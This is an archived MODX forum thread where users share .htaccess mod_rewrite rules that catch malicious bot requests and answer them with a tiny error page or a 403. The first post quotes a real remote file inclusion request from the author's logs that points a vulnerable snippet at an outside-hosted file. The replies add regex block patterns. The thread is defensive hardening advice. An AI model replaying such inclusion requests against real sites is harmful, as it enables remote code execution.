We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

Lowering artificial traffic on modx site

    • 1122
    • 209 Posts
    Alik Reply #1, 15 years, 2 months ago
    From the moment I moved my site to a MODx platform, I began to observe an increase in the number of various scripts targeting it. I run my site on a self-configured and self-maintained server, which allows me to study every such script in detail.

    The overwhelming majority of requests sent by malicious scripts simply result in sending out error documents, however, sometimes the scripts cause parse errors, which prompts me to study the source code and patch its weak spots. For the past two months, I have been highly satisfied with the server’s ability to distinguish between error requests by human users and malicious scripts.

    I have two error documents set up for my MODx site:
      404-object-not-found <- it is a full-fledged xhtml/css/graphics-decorated page sent when human misspells the url in address bar
      404-burp <- it is a document based on „blank” template, its content comprises single word „Burp!” and these five bytes are sent in response to malicious scripts (instead of, for example, 50-70 KB of full-featured xhtml/css that for sure will not be appreciated in any way by non-human caller).

    Now for the most important part: each request should be analyzed and distinguished by the server. Almost every well-designed MODx site takes advantage of the „mod_rewrite” module and this is a great opportunity for such an analysis.

    After activating the rewriting feature, you can include the following in the .htaccess file:
    # handle invalid requests (human part)
ErrorDocument 403 http://sitedomain/404-object-not-found
ErrorDocument 404 http://sitedomain/404-object-not-found

# burp in response to malicious scripts
RewriteCond %{QUERY_STRING} (base(dir)?|(classes|lib)_dir|error|inhalt|page|path)=|root_dir|request|session|http:// [NC]
RewriteRule ^(.*)$ 404-burp? [R,L]

    The RewriteCond rule is the result of my observations of site access statistics and error and request logs. Malicious scripts attempt to accomplish their goals by sending weird query strings — these strings are intercepted by the server and the entire request is handled by four characters and an exclamation mark.

    We have no influence over who attempts to access our page (or what their intent is), but we can decide what the response will be. Example responses:

    Human’s mistake:
      http://setpro.net.pl/misspelled
    "Classical" sniffing the MODx site -- request sent from within Perl script:
      http://setpro.net.pl/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sites.google.com/site/bsdcr3w/Home/prc.gif??
      • 26931
      • 2,314 Posts
      anonymized-26931 Reply #2, 15 years, 2 months ago
      thank you for sharing!

      jan
        • 20413
        • 2,877 Posts
        mrhaw Reply #3, 15 years, 2 months ago
        This is awesome! cool

        Is this server specific: " ...|classes_dir|error|inhalt|lib_dir|page|path)=|root_dir|request|session| ..." or works the
        same on modx/apache in general?
          @hawproductions | http://mrhaw.com/

          Infograph: MODX Advanced Install in 7 steps:
          http://forums.modx.com/thread/96954/infograph-modx-advanced-install-in-7-steps

          Recap: Portland, OR (PDX) MODX CMS Meetup, Oct 6, 2015. US Bancorp Tower
          http://mrhaw.com/modx_portland_oregon_pdx_modx_cms_meetup_oct_2015_us_bancorp_tower
          • 1122
          • 209 Posts
          Alik Reply #4, 15 years, 2 months ago
          It works with Apache/modx provided that friendly urls are enabled (i.e. Apache’s module mod_rewrite is active) -- see two examples that were added to original post.
            • 4310
            • 2,310 Posts
            bunk58 Reply #5, 15 years, 2 months ago
            Inspired smiley
              • 20413
              • 2,877 Posts
              mrhaw Reply #6, 14 years, 10 months ago
              I use this 
              # burp in response to malicious scripts
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*) [NC]
RewriteRule ^(.*)$ 404-burp? [R,L]


              based on this: http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite

              When I used yours it worked too good - Trying to access file manager just returned "Burp!" laugh

                @hawproductions | http://mrhaw.com/

                Infograph: MODX Advanced Install in 7 steps:
                http://forums.modx.com/thread/96954/infograph-modx-advanced-install-in-7-steps

                Recap: Portland, OR (PDX) MODX CMS Meetup, Oct 6, 2015. US Bancorp Tower
                http://mrhaw.com/modx_portland_oregon_pdx_modx_cms_meetup_oct_2015_us_bancorp_tower
                • 3749
                • 24,544 Posts
                BobRay Reply #7, 14 years, 10 months ago
                Great suggestion.

                I can’t remember where I got it, but I was able to block a lot of traffic with this:

                #first, block bad bots
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* - [F,L]

RewriteCond %{QUERY_STRING} snippet\.reflect\.php [NC,OR]
RewriteCond %{QUERY_STRING} reflect_base [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
RewriteRule .* - [F,L]
                  Did I help you? Buy me a beer
                  Get my Book: MODX:The Official Guide
                  MODX info for everyone: http://bobsguides.com/modx.html
                  My MODX Extras
                  Bob's Guides is now hosted at A2 MODX Hosting